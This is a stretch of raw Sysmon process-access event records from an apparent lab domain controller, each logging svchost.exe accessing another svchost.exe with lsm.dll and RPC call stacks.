10341000x800000000000000010945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.367{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.352{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.336{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.336{59A5CD1D-93FB-6005-FE04-00000000A301}51084896C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.305{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
